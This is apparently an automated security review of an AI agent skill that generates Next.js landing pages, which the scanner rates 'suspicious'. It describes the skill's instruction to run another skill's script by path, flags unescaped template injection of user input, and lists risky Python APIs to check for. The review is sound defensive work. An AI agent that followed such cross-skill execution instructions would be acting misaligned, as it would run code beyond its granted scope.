Skillv1.0.0

ClawScan security

landing-page-generator · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

SuspiciousMar 11, 2026, 3:52 PM

Verdict: suspicious
Confidence: medium
Model: gpt-5-mini
Summary: The skill largely matches its stated purpose (generating Next.js/Tailwind landing page components), but the runtime instructions reference running a script from another skill (cross-skill file access) and the included generator templates embed user content without consistent escaping — these inconsistencies merit caution before installing.
Guidance: What to check before installing/using this skill: - Ask the skill author why SKILL.md points to marketing-skill/content-production/scripts/brand_voice_analyzer.py. That path is outside this skill; either the referenced analyzer should be bundled or the SKILL.md should stop instructing cross-skill execution. Running code from other skills or arbitrary paths can expose other data and broaden the attack surface. - Inspect landing_page_scaffolder.py yourself (or have a developer do so). I did not see network calls in the provided excerpts, but confirm there are no uses of requests, urllib, socket, subprocess/os.system, eval/exec, or other code that could exfiltrate data or execute arbitrary commands. - Watch for template injection: generator functions embed user-provided fields (headlines, links, testimonials) directly into TSX. If you supply untrusted HTML/JS in inputs, that can produce unsafe output. Ensure inputs are sanitized/escaped when generating production pages, or treat generator output as code that must be reviewed before deployment. - If you want brand-voice analysis, ask the maintainer to include the analyzer in this skill (or expose a safe API) rather than instructing the agent to run another skill's script by path. That removes the cross-skill access ambiguity. - Run this skill in a sandboxed environment first (no access to production secrets or other skills) and review generated files before publishing them. If the author cannot justify the external script reference or provide the analyzer bundled/verified, consider the instruction a red flag and avoid following that step.

Review Dimensions

Purpose & Capability: noteName/description align with the assets provided: SKILL.md describes generating TSX + Tailwind and a Python scaffolder (scripts/landing_page_scaffolder.py) is included and appears to produce the claimed components. However, the SKILL.md also instructs the agent to run an external script path (marketing-skill/content-production/scripts/brand_voice_analyzer.py) that is not part of this skill, which is not obviously required to generate components and is an unexpected cross-skill dependency.
Instruction Scope: concernThe SKILL.md instructs the agent to 'run' or use an external script located at marketing-skill/content-production/scripts/brand_voice_analyzer.py to analyse brand voice. That directs the agent to access and execute code outside this skill's bundle (scope creep). The rest of the instructions (collect product inputs, apply copy frameworks, validate against SEO checklist, output TSX) are on-purpose. Also, the included Python templates interpolate user-supplied content into TSX without consistent escaping (escape() exists but many generators embed values directly), which could lead to broken or unsafe generated pages if untrusted inputs are used.
Install Mechanism: okNo install spec — instruction-only plus one script file. No downloads, package installs, or archives are declared, so nothing will be auto-installed on the host beyond whatever the agent chooses to run. This is lower-risk from an install-mechanism perspective.
Credentials: okThe skill requests no environment variables, no credentials, and no config paths. That is proportionate to a code-generation/templating tool and reduces risk of secret exfiltration via required env access.
Persistence & Privilege: okalways:false and no install hooks are present. The skill does not request persistent privileges or automatic inclusion. It also does not declare writes to other skills' configs. The main concern is the instruction to run another skill's script — that could grant broader access at runtime if followed, but the skill itself doesn't request persistent privileges.